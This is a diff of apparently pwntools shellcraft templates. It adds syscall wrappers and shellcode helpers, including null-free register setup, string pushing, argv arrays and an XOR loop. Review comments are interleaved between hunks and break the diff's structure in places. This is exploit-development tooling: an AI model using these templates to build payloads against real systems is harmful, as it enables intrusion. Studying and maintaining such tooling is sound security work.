b/pwnlib/shellcraft/templates/i386/linux/timer_gettime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="timerid, value"/> +<%docstring> +Invokes the syscall timer_gettime. See 'man 2 timer_gettime' for more information. + +Arguments: + timerid(timer_t): timerid + value(itimerspec): value + + + ${syscall('SYS_timer_gettime', timerid, value)} diff --git a/pwnlib/shellcraft/templates/i386/linux/timer_settime.asm b/pwnlib/shellcraft/templates/i386/linux/timer_settime.asm new file mode 100644 index 000000000..6ea28bac4 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/timer_settime.asm 
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="timerid, flags, value, ovalue"/> +<%docstring> +Invokes the syscall timer_settime. See 'man 2 timer_settime' for more information. + +Arguments: + timerid(timer_t): timerid + flags(int): flags + value(itimerspec): value + ovalue(itimerspec): ovalue + + + ${syscall('SYS_timer_settime', timerid, flags, value, ovalue)} diff --git a/pwnlib/shellcraft/templates/i386/linux/truncate.asm b/pwnlib/shellcraft/templates/i386/linux/truncate.asm new file mode 100644 index 000000000..723424537 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/truncate.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate. See 'man 2 truncate' for more information. + +Arguments: + file(char): file + length(off_t): length + + + ${syscall('SYS_truncate', file, length)} diff --git a/pwnlib/shellcraft/templates/i386/linux/truncate64.asm b/pwnlib/shellcraft/templates/i386/linux/truncate64.asm new file mode 100644 index 000000000..7922404d7 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/truncate64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate64. See 'man 2 truncate64' for more information. + +Arguments: + file(char): file + length(off64_t): length + + + ${syscall('SYS_truncate64', file, length)} diff --git a/pwnlib/shellcraft/templates/i386/linux/ulimit.asm b/pwnlib/shellcraft/templates/i386/linux/ulimit.asm new file mode 100644 index 000000000..fdacb9150 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/ulimit.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="cmd, vararg"/> +<%docstring> +Invokes the syscall ulimit. See 'man 2 ulimit' for more information. + +Arguments: + cmd(int): cmd + vararg(int): vararg + + + ${syscall('SYS_ulimit', cmd, vararg)} diff --git a/pwnlib/shellcraft/templates/i386/linux/umask.asm b/pwnlib/shellcraft/templates/i386/linux/umask.asm new file mode 100644 index 000000000..878803fce --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/umask.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="mask"/> +<%docstring> +Invokes the syscall umask. See 'man 2 umask' for more information. + +Arguments: + mask(mode_t): mask + + + ${syscall('SYS_umask', mask)} diff --git a/pwnlib/shellcraft/templates/i386/linux/uname.asm b/pwnlib/shellcraft/templates/i386/linux/uname.asm new file mode 100644 index 000000000..36025e8f0 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/uname.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall uname. See 'man 2 uname' for more information. + +Arguments: + name(utsname): name + + + ${syscall('SYS_uname', name)} diff --git a/pwnlib/shellcraft/templates/i386/linux/unlink.asm b/pwnlib/shellcraft/templates/i386/linux/unlink.asm new file mode 100644 index 000000000..5c6c92f38 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/unlink.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall unlink. See 'man 2 unlink' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_unlink', name)} diff --git a/pwnlib/shellcraft/templates/i386/linux/unlinkat.asm b/pwnlib/shellcraft/templates/i386/linux/unlinkat.asm new file mode 100644 index 000000000..c09bcc0da --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/unlinkat.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, name, flag"/> +<%docstring> +Invokes the syscall unlinkat. See 'man 2 unlinkat' for more information. + +Arguments: + fd(int): fd + name(char): name + flag(int): flag + + + ${syscall('SYS_unlinkat', fd, name, flag)} diff --git a/pwnlib/shellcraft/templates/i386/linux/unshare.asm b/pwnlib/shellcraft/templates/i386/linux/unshare.asm new file mode 100644 index 000000000..5443ade5b --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/unshare.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall unshare. See 'man 2 unshare' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_unshare', flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/ustat.asm b/pwnlib/shellcraft/templates/i386/linux/ustat.asm new file mode 100644 index 000000000..b60712af8 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/ustat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="dev, ubuf"/> +<%docstring> +Invokes the syscall ustat. See 'man 2 ustat' for more information. + +Arguments: + dev(dev_t): dev + ubuf(ustat): ubuf + + + ${syscall('SYS_ustat', dev, ubuf)} diff --git a/pwnlib/shellcraft/templates/i386/linux/utime.asm b/pwnlib/shellcraft/templates/i386/linux/utime.asm new file mode 100644 index 000000000..b1973fa95 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/utime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="file, file_times"/> +<%docstring> +Invokes the syscall utime. See 'man 2 utime' for more information. + +Arguments: + file(char): file + file_times(utimbuf): file_times + + + ${syscall('SYS_utime', file, file_times)} 
diff --git a/pwnlib/shellcraft/templates/i386/linux/utimensat.asm b/pwnlib/shellcraft/templates/i386/linux/utimensat.asm new file mode 100644 index 000000000..9da2d9653 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/utimensat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, path, times, flags"/> +<%docstring> +Invokes the syscall utimensat. See 'man 2 utimensat' for more information. + +Arguments: + fd(int): fd + path(char): path + times(timespec): times + flags(int): flags + + + ${syscall('SYS_utimensat', fd, path, times, flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/utimes.asm b/pwnlib/shellcraft/templates/i386/linux/utimes.asm new file mode 100644 index 000000000..bc498c12d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/utimes.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="file, tvp"/> +<%docstring> +Invokes the syscall utimes. See 'man 2 utimes' for more information. + +Arguments: + file(char): file + tvp(timeval): tvp + + + ${syscall('SYS_utimes', file, tvp)} diff --git a/pwnlib/shellcraft/templates/i386/linux/vfork.asm b/pwnlib/shellcraft/templates/i386/linux/vfork.asm new file mode 100644 index 000000000..9314c4e64 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/vfork.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall vfork. See 'man 2 vfork' for more information. + +Arguments: + + + + ${syscall('SYS_vfork')} diff --git a/pwnlib/shellcraft/templates/i386/linux/vhangup.asm b/pwnlib/shellcraft/templates/i386/linux/vhangup.asm new file mode 100644 index 000000000..fbf4e711d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/vhangup.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall vhangup. See 'man 2 vhangup' for more information. + +Arguments: + + + + ${syscall('SYS_vhangup')} diff --git a/pwnlib/shellcraft/templates/i386/linux/vmsplice.asm b/pwnlib/shellcraft/templates/i386/linux/vmsplice.asm new file mode 100644 index 000000000..3d2a1498d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/vmsplice.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fdout, iov, count, flags"/> +<%docstring> +Invokes the syscall vmsplice. See 'man 2 vmsplice' for more information. + +Arguments: + fdout(int): fdout + iov(iovec): iov + count(size_t): count + flags(unsigned): flags + + + ${syscall('SYS_vmsplice', fdout, iov, count, flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/wait4.asm b/pwnlib/shellcraft/templates/i386/linux/wait4.asm new file mode 100644 index 000000000..9a0968d34 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/wait4.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pid, stat_loc, options, usage"/> +<%docstring> +Invokes the syscall wait4. See 'man 2 wait4' for more information. + +Arguments: + pid(pid_t): pid + stat_loc(WAIT_STATUS): stat_loc + options(int): options + usage(rusage): usage + + + ${syscall('SYS_wait4', pid, stat_loc, options, usage)} diff --git a/pwnlib/shellcraft/templates/i386/linux/waitid.asm b/pwnlib/shellcraft/templates/i386/linux/waitid.asm new file mode 100644 index 000000000..2235af949 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/waitid.asm 
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="idtype, id, infop, options"/> +<%docstring> +Invokes the syscall waitid. See 'man 2 waitid' for more information. + +Arguments: + idtype(idtype_t): idtype + id(id_t): id + infop(siginfo_t): infop + options(int): options + + + ${syscall('SYS_waitid', idtype, id, infop, options)} diff --git a/pwnlib/shellcraft/templates/i386/linux/waitpid.asm b/pwnlib/shellcraft/templates/i386/linux/waitpid.asm new file mode 100644 index 000000000..d7a7fbd5e --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/waitpid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pid, stat_loc, options"/> +<%docstring> +Invokes the syscall waitpid. See 'man 2 waitpid' for more information. + +Arguments: + pid(pid_t): pid + stat_loc(int): stat_loc + options(int): options + + + ${syscall('SYS_waitpid', pid, stat_loc, options)} diff --git a/pwnlib/shellcraft/templates/i386/linux/writev.asm b/pwnlib/shellcraft/templates/i386/linux/writev.asm new file mode 100644 index 000000000..1b785e57b --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/writev.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, iovec, count"/> +<%docstring> +Invokes the syscall writev. See 'man 2 writev' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + + + ${syscall('SYS_writev', fd, iovec, count)} diff --git a/pwnlib/shellcraft/templates/i386/memcpy.asm b/pwnlib/shellcraft/templates/i386/memcpy.asm new file mode 100644 index 000000000..92edd4f99 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/memcpy.asm 
@@ -0,0 +1,15 @@ +<% from pwnlib.shellcraft import i386, pretty %> +<%docstring>Copies memory. + +Args: + dest: Destination address + src: Source address + n: Number of bytes + +<%page args="dest, src, n"/> + + /* memcpy(${pretty(dest)}, ${pretty(src)}, ${pretty(n)}) */ + cld + ${i386.setregs({'edi': dest, 'esi': src, 'ecx': n})} + rep movsb + diff --git a/pwnlib/shellcraft/templates/i386/mov.asm b/pwnlib/shellcraft/templates/i386/mov.asm index 1990c21cb..685aa3026 100644 --- a/pwnlib/shellcraft/templates/i386/mov.asm +++ b/pwnlib/shellcraft/templates/i386/mov.asm @@ -1,6 +1,6 @@ <% + from pwnlib.shellcraft import eval, pretty, okay from pwnlib.util import lists, packing, fiddling, misc - from pwnlib.constants import eval, Constant from pwnlib.log import getLogger from pwnlib.shellcraft.registers import get_register, is_register, bits_required log = getLogger('pwnlib.shellcraft.i386.mov') @@ -20,6 +20,11 @@ If src is a string that is not a register, then it will locally set string. Note that this means that this shellcode can change behavior depending on the value of `context.os`. +Args: + dest (str): The destination register. + src (str): Either the input register, or an immediate value. + stack_allowed (bool): Can the stack be used? + Example: >>> print shellcraft.i386.mov('eax','ebx').rstrip() @@ -44,11 +49,11 @@ Example: >>> print shellcraft.i386.mov('ax', 'bl').rstrip() movzx ax, bl >>> print shellcraft.i386.mov('eax', 1).rstrip() - push 0x1 + push 1 pop eax >>> print shellcraft.i386.mov('eax', 1, stack_allowed=False).rstrip() xor eax, eax - mov al, 0x1 + mov al, 1 >>> print shellcraft.i386.mov('eax', 0xdead00ff).rstrip() mov eax, -0xdead00ff neg eax 
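Review bot: The memcpy docstring lists dest/src/n but not the side effects a caller chaining shellcraft fragments needs: `setregs` overwrites edi, esi and ecx, and `cld` clears the direction flag. A line under Args such as `Clobbers edi, esi and ecx; clears DF.` would cover it. The explicit `cld` before `rep movsb` is the right call, since the copy direction depends on DF and nothing guarantees its state on entry.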
@@ -81,26 +86,10 @@ Example: push (SYS_execve) /* 0x3b */ pop eax >>> print shellcraft.i386.mov('eax', 'PROT_READ | PROT_WRITE | PROT_EXEC').rstrip() - push (PROT_READ | PROT_WRITE | PROT_EXEC) /* 0x7 */ + push (PROT_READ | PROT_WRITE | PROT_EXEC) /* 7 */ pop eax - -Args: - dest (str): The destination register. - src (str): Either the input register, or an immediate value. - stack_allowed (bool): Can the stack be used? <% -def okay(s): - return '\0' not in s and '\n' not in s - -def pretty(n): - if isinstance(n, Constant): - return '%s /* %#x */' % (n,n) - elif n < 0: - return str(n) - else: - return hex(n) - src_name = src if not isinstance(src, (str, tuple)): src_name = pretty(src) diff --git a/pwnlib/shellcraft/templates/i386/prolog.asm b/pwnlib/shellcraft/templates/i386/prolog.asm new file mode 100644 index 000000000..88c72e391 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/prolog.asm @@ -0,0 +1,6 @@ +<%docstring> +Function prologue. + + + push ebp + mov ebp, esp diff --git a/pwnlib/shellcraft/templates/i386/push.asm b/pwnlib/shellcraft/templates/i386/push.asm index 751edfdea..809072b97 100644 --- a/pwnlib/shellcraft/templates/i386/push.asm +++ b/pwnlib/shellcraft/templates/i386/push.asm 
@@ -21,23 +21,26 @@ Args: Example: >>> print pwnlib.shellcraft.i386.push(0).rstrip() - /* push 0 == 0x0 */ - push 0x1 + /* push 0 */ + push 1 dec byte ptr [esp] >>> print pwnlib.shellcraft.i386.push(1).rstrip() - /* push 1 == 0x1 */ - push 0x1 + /* push 1 */ + push 1 >>> print pwnlib.shellcraft.i386.push(256).rstrip() - /* push 256 == 0x100 */ + /* push 0x100 */ push 0x1010201 xor dword ptr [esp], 0x1010301 - >>> with context.local(os = 'linux'): - ... print pwnlib.shellcraft.i386.push('SYS_execve').rstrip() - /* push (SYS_execve) == 0xb */ + >>> print pwnlib.shellcraft.i386.push('SYS_execve').rstrip() + /* push (SYS_execve) (0xb) */ push 0xb + >>> print pwnlib.shellcraft.i386.push('SYS_sendfile').rstrip() + /* push (SYS_sendfile) (0xbb) */ + push 0x1010101 + xor dword ptr [esp], 0x10101ba >>> with context.local(os = 'freebsd'): ... print pwnlib.shellcraft.i386.push('SYS_execve').rstrip() - /* push (SYS_execve) == 0x3b */ + /* push (SYS_execve) (0x3b) */ push 0x3b diff --git a/pwnlib/shellcraft/templates/i386/pushstr.asm b/pwnlib/shellcraft/templates/i386/pushstr.asm index 701058c80..1cd48ed0f 100644 --- a/pwnlib/shellcraft/templates/i386/pushstr.asm +++ b/pwnlib/shellcraft/templates/i386/pushstr.asm @@ -1,5 +1,6 @@ <% from pwnlib.util import lists, packing, fiddling + from pwnlib.shellcraft import pretty, okay %> <%page args="string, append_null = True"/> <%docstring> @@ -10,7 +11,7 @@ Example: >>> print shellcraft.i386.pushstr('').rstrip() /* push '\x00' */ - push 0x1 + push 1 dec byte ptr [esp] >>> print shellcraft.i386.pushstr('a').rstrip() /* push 'a\x00' */ @@ -25,7 +26,7 @@ Example: xor dword ptr [esp], 0x1606060 >>> print shellcraft.i386.pushstr('aaaa').rstrip() /* push 'aaaa\x00' */ - push 0x1 + push 1 dec byte ptr [esp] push 0x61616161 >>> print shellcraft.i386.pushstr('aaaaa').rstrip() 
@@ -41,7 +42,7 @@ Example: xor dword ptr [esp], 0x10101c2 >>> print shellcraft.i386.pushstr('\xc3', append_null = False).rstrip() /* push '\xc3' */ - push 0x...c3 + push -0x3d >>> with context.local(): ... context.arch = 'i386' ... print enhex(asm(shellcraft.pushstr("/bin/sh"))) @@ -71,24 +72,12 @@ if append_null: if not string: return -def okay(s): - return '\n' not in s and '\0' not in s - if ord(string[-1]) >= 128: extend = '\xff' else: extend = '\x00' - -def orig_pretty(n): - if isinstance(n, int): - return '%s == %#x' % (n,n) - elif isinstance(n, str): - return repr(n) - -def pretty(n): - return hex(n & (2 ** 32 - 1)) %>\ - /* push ${orig_pretty(original)} */ + /* push ${pretty(original, False)} */ % for word in lists.group(4, string, 'fill', extend)[::-1]: <% sign = packing.u32(word, endian='little', sign='signed') diff --git a/pwnlib/shellcraft/templates/i386/pushstr_array.asm b/pwnlib/shellcraft/templates/i386/pushstr_array.asm new file mode 100644 index 000000000..a728878b0 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/pushstr_array.asm 
@@ -0,0 +1,38 @@ +<% from pwnlib.shellcraft import i386 %> +<%docstring> +Pushes an array/envp-style array of pointers onto the stack. + +Arguments: + reg(str): + Destination register to hold the pointer. + array(str,list): + Single argument or list of arguments to push. + NULL termination is normalized so that each argument + ends with exactly one NULL byte. + +<%page args="reg, array"/> +<% +if isinstance(array, (str)): + array = [array] + +array_str = '' + +# Normalize all of the arguments' endings +array = [arg.rstrip('\x00') + '\x00' for arg in array] +array_str = ''.join(array) + +word_size = 4 +offset = len(array_str) + word_size + +%>\ + /* push argument array ${repr(array)} */ + ${i386.pushstr(array_str)} + ${i386.mov(reg, 0)} + push ${reg} /* null terminate */ +% for i,arg in enumerate(reversed(array)): + ${i386.mov(reg, offset + word_size*i - len(arg))} + add ${reg}, esp + push ${reg} /* ${repr(arg)} */ + <% offset -= len(arg) %>\ +% endfor + ${i386.mov(reg,'esp')} diff --git a/pwnlib/shellcraft/templates/i386/setregs.asm b/pwnlib/shellcraft/templates/i386/setregs.asm index ef851d6c6..4428c5bee 100644 --- a/pwnlib/shellcraft/templates/i386/setregs.asm +++ b/pwnlib/shellcraft/templates/i386/setregs.asm @@ -15,12 +15,11 @@ Args: Example: - >>> R = shellcraft.registers.i386 - >>> print shellcraft.setregs({'eax':1, 'ebx':'eax'}, R).rstrip() + >>> print shellcraft.setregs({'eax':1, 'ebx':'eax'}).rstrip() mov ebx, eax - push 0x1 + push 1 pop eax - >>> print shellcraft.setregs({'eax':'ebx', 'ebx':'eax', 'ecx':'ebx'}, R).rstrip() + >>> print shellcraft.setregs({'eax':'ebx', 'ebx':'eax', 'ecx':'ebx'}).rstrip() mov ecx, ebx xchg eax, ebx diff --git a/pwnlib/shellcraft/templates/i386/stackarg.asm b/pwnlib/shellcraft/templates/i386/stackarg.asm new file mode 100644 index 000000000..cebe6f709 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/stackarg.asm 
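Review bot: The pushstr_array docstring opens with "array/envp-style array", which should read `argv/envp-style`, and it should state that `reg` is used as scratch throughout and ends up holding the array pointer, and that every element of `array` must be a str (the `arg.rstrip('\x00')` normalization fails on anything else). In the Python block the first `array_str = ''` is dead, since it is reassigned from `''.join(array)` two lines later, and `isinstance(array, (str))` has redundant parentheses around a single type: `isinstance(array, str)`. The offset arithmetic in the loop looks right: each pointer is measured from esp after the terminating NULL and the previously pushed pointers, so pushstr's trailing padding at the high end does not affect it; a comment saying so next to `offset = len(array_str) + word_size` would save the next reader the derivation.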
@@ -0,0 +1,13 @@ +<%page args="index, register"/> +<%docstring> +Loads a stack-based argument into a register. + +Assumes that the 'prolog' code was used to save EBP. + +Arguments: + index(int): + Zero-based argument index. + register(str): + Register name. + + mov ${register}, [ebp+${4*(index+2)}] diff --git a/pwnlib/shellcraft/templates/i386/strcpy.asm b/pwnlib/shellcraft/templates/i386/strcpy.asm new file mode 100644 index 000000000..1fd097176 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/strcpy.asm @@ -0,0 +1,28 @@ +<% +from pwnlib.shellcraft import pretty, value, common, registers +from pwnlib.shellcraft.i386 import mov, pushstr, setregs, strlen +from pwnlib import constants +%> +<%docstring> +Copies a string + +Example: + + >>> sc = 'jmp get_str\n' + >>> sc += 'pop_str: pop eax\n' + >>> sc += shellcraft.i386.strcpy('esp', 'eax') + >>> sc += shellcraft.i386.linux.write(1, 'esp', 32) + >>> sc += shellcraft.i386.linux.exit(0) + >>> sc += 'get_str: call pop_str\n' + >>> sc += '.asciz "Hello, world\\n"' + >>> run_assembly(sc).recvline() + 'Hello, world\n' + +<%page args="dst, src"/> + ${setregs({'esi': src, + 'edi': dst})} + push edi + ${strlen('esi')} + pop edi + inc ecx + rep movs BYTE PTR [edi], BYTE PTR [esi] diff --git a/pwnlib/shellcraft/templates/i386/strlen.asm b/pwnlib/shellcraft/templates/i386/strlen.asm new file mode 100644 index 000000000..e838f4adf --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/strlen.asm 
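Review bot: The `[ebp+${4*(index+2)}]` displacement in stackarg's single mov line is a magic offset with no explanation; a comment on that line would help, e.g. `/* [ebp] = saved ebp, [ebp+4] = return address, args start at [ebp+8] */`. There is also no check that `index` is a non-negative integer: a negative value silently reads the saved frame pointer or the return address, and a non-int produces a garbled operand at assembly time, so either `if index < 0: raise ValueError('index must be non-negative')` in a `<% %>` block or a docstring sentence stating the precondition would be worth adding.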
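Review bot: strcpy relies on `rep movs` walking forward but never clears DF, unlike memcpy in this same commit, which issues `cld` before its `rep movsb`; the `repnz scas` in strlen has the same dependency. If a preceding fragment or the host process left DF set, both walk backwards from the start address, so adding `cld` before the `rep movs` here (and before `repnz scas` in strlen) costs one byte and removes the assumption. The docstring also lacks the Arguments section the other new templates carry and does not say that eax, ecx, esi and edi are clobbered (esi/edi by setregs, eax/ecx by the embedded strlen); `pretty, value, common, registers, mov, pushstr` and `constants` are imported but unused.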
@@ -0,0 +1,35 @@ +<% +from pwnlib.shellcraft import pretty, value, common, registers +from pwnlib.shellcraft.i386 import mov, pushstr, setregs +from pwnlib import constants +%> +<%docstring> +Calculate the length of the specified string. + +Arguments: + string(str): Register or address with the string + reg(str): Named register to return the value in, + ecx is the default. + +Example: + + >>> sc = 'jmp get_str\n' + >>> sc += 'pop_str: pop eax\n' + >>> sc += shellcraft.i386.strlen('eax') + >>> sc += 'push ecx;' + >>> sc += shellcraft.i386.linux.write(1, 'esp', 4) + >>> sc += shellcraft.i386.linux.exit(0) + >>> sc += 'get_str: call pop_str\n' + >>> sc += '.asciz "Hello, world\\n"' + >>> run_assembly(sc).unpack() == len('Hello, world\n') + True + +<%page args="string, reg='ecx'"/> + ${setregs({'ecx': -1, + 'edi': string, + 'eax': 0})} + repnz scas al, BYTE PTR [edi] + inc ecx + inc ecx + neg ecx + ${mov(reg, 'ecx')} diff --git a/pwnlib/shellcraft/templates/i386/xor.asm b/pwnlib/shellcraft/templates/i386/xor.asm new file mode 100644 index 000000000..01b716b83 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/xor.asm 
@@ -0,0 +1,82 @@ +<% + from pwnlib.shellcraft import pretty, common, i386, registers + from pwnlib.util.packing import pack, unpack + from pwnlib.context import context as ctx + from pwnlib.log import getLogger +%> +<%page args="key, address, count"/> +<%docstring> +XORs data a constant value. + +Args: + key (int,str): XOR key either as a 4-byte integer, + If a string, length must be a power of two, + and not longer than 4 bytes. + Alternately, may be a register. + address (int): Address of the data (e.g. 0xdead0000, 'esp') + count (int): Number of bytes to XOR, or a register containing + the number of bytes to XOR. + +Example: + + >>> sc = shellcraft.read(0, 'esp', 32) + >>> sc += 'mov ebx, [esp]\n' + >>> sc += 'mov edx, eax' + >>> sc += shellcraft.xor('ebx', 'esp', 'eax') + >>> sc += shellcraft.write(1, 'esp', 'edx') + >>> io = run_assembly(sc) + >>> io.send(cyclic(32)) + >>> io.recv() == xor(cyclic(context.bytes), cyclic(32)) + True + +<% +log = getLogger('pwnlib.shellcraft.templates.i386.xor') + +# By default, assume the key is a register +key_size = ctx.bytes +key_pretty = key + +key_register = registers.get_register(key) + +if key_register: + assert key_register.bytes == ctx.bytes +else: + key_str = key + key_int = key + + if isinstance(key, int): + key_str = pack(key, bytes=4) + else: + key_int = unpack(key, 'all') + + if len(key_str) > ctx.bytes: + log.error("Key %s is too large (max %i bytes)" % (pretty(key), ctx.bytes)) + + if len(key_str) not in (1,2,4): + log.error("Key length must be a power of two (got %s)" % pretty(key)) + + key_size = len(key_str) + key_pretty = pretty(key_int) + +if count == 0 or key_size == 0: + return '/* noop xor */' + +start = common.label('start') + +## Determine the move size +word_name = {1:'BYTE', 2:'WORD', 4:'DWORD', 8:'QWORD'}[key_size] + +## Set up the register context +regctx = {'eax': count, 'ecx': address} +if key_register and key_register.name in regctx: + regctx['ebx'] = key + key_pretty = 'ebx' +%> + /* 
xor(${pretty(key)}, ${pretty(address)}, ${pretty(count)}) */ + ${i386.setregs(regctx)} + add eax, ecx +${start}: + xor ${word_name} PTR [ecx], ${key_pretty} + add ecx, ${key_size} + cmp ecx, eax + jb ${start} diff --git a/pwnlib/shellcraft/templates/mips/linux/accept.asm b/pwnlib/shellcraft/templates/mips/linux/accept.asm new file mode 100644 index 000000000..328b230fc --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/accept.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, addr, addr_len"/> +<%docstring> +Invokes the syscall accept. See 'man 2 accept' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + addr_len(socklen_t): addr_len + + + ${syscall('SYS_accept', fd, addr, addr_len)} diff --git a/pwnlib/shellcraft/templates/mips/linux/access.asm b/pwnlib/shellcraft/templates/mips/linux/access.asm new file mode 100644 index 000000000..6c88167bb --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/access.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="name, type"/> +<%docstring> +Invokes the syscall access. See 'man 2 access' for more information. + +Arguments: + name(char): name + type(int): type + + + ${syscall('SYS_access', name, type)} diff --git a/pwnlib/shellcraft/templates/mips/linux/acct.asm b/pwnlib/shellcraft/templates/mips/linux/acct.asm new file mode 100644 index 000000000..0da285624 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/acct.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall acct. See 'man 2 acct' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_acct', name)} diff --git a/pwnlib/shellcraft/templates/mips/linux/alarm.asm b/pwnlib/shellcraft/templates/mips/linux/alarm.asm new file mode 100644 index 000000000..2bb7a45f8 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/alarm.asm 
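Review bot: The loop in xor.asm assumes `count` is a multiple of the key size: with `cmp ecx, eax` / `jb`, the final iteration XORs a full `key_size`-byte word even when fewer bytes remain, so count=5 with a 4-byte key also modifies bytes 5..7 past the requested range. When `count` is an int this can be rejected in the Python block, `if isinstance(count, int) and count % key_size: log.error("count %s is not a multiple of the key size %i" % (pretty(count), key_size))`, and the docstring should state the requirement for the register-count case. Two smaller points: the register path reports a wrong-width key via `assert key_register.bytes == ctx.bytes`, while every other key validation in the block uses `log.error`, and the summary line "XORs data a constant value" is missing "with". The docstring should also note that eax, ecx and possibly ebx are clobbered.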
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="seconds"/> +<%docstring> +Invokes the syscall alarm. See 'man 2 alarm' for more information. + +Arguments: + seconds(unsigned): seconds + + + ${syscall('SYS_alarm', seconds)} diff --git a/pwnlib/shellcraft/templates/mips/linux/bind.asm b/pwnlib/shellcraft/templates/mips/linux/bind.asm new file mode 100644 index 000000000..6cf11a759 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/bind.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall bind. See 'man 2 bind' for more information. + +Arguments: + fd(int): fd + addr(CONST_SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_bind', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/mips/linux/brk.asm b/pwnlib/shellcraft/templates/mips/linux/brk.asm new file mode 100644 index 000000000..a54676052 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/brk.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="addr"/> +<%docstring> +Invokes the syscall brk. See 'man 2 brk' for more information. + +Arguments: + addr(void): addr + + + ${syscall('SYS_brk', addr)} diff --git a/pwnlib/shellcraft/templates/mips/linux/cat.asm b/pwnlib/shellcraft/templates/mips/linux/cat.asm new file mode 100644 index 000000000..7a5bf80b2 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/cat.asm 
